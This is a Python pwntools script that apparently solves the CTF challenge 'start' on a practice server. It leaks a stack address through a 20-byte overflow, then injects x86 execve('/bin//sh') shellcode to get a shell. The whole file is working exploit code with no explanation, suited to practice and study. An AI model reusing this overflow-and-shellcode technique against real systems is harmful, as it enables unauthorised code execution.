from pwn import *
loacl_elf = ELF("./start")
context.arch = loacl_elf.arch
#p = process("./start")
p = remote("node3.buuoj.cn",28802)
#gdb.attach(p, 'b* 0x08048060')
#shellcode=asm(shellcraft.sh())
shellcode = asm("xor ecx,ecx;\
xor edx,edx;\
push edx;\
push 0x68732f6e;\
push 0x69622f2f;\
mov ebx,esp;\
mov al,0xb;\
int 0x80")
#payload = 'a'*20
payload = 'a'*20 + p32(0x08048087)
p.recvuntil("Let's start the CTF:")
p.send(payload)
esp_addr = u32(p.recv(4))
p.recv()
payload= 'a' * 20 + p32(esp_addr + 20) + shellcode
p.send(payload)
p.interactive()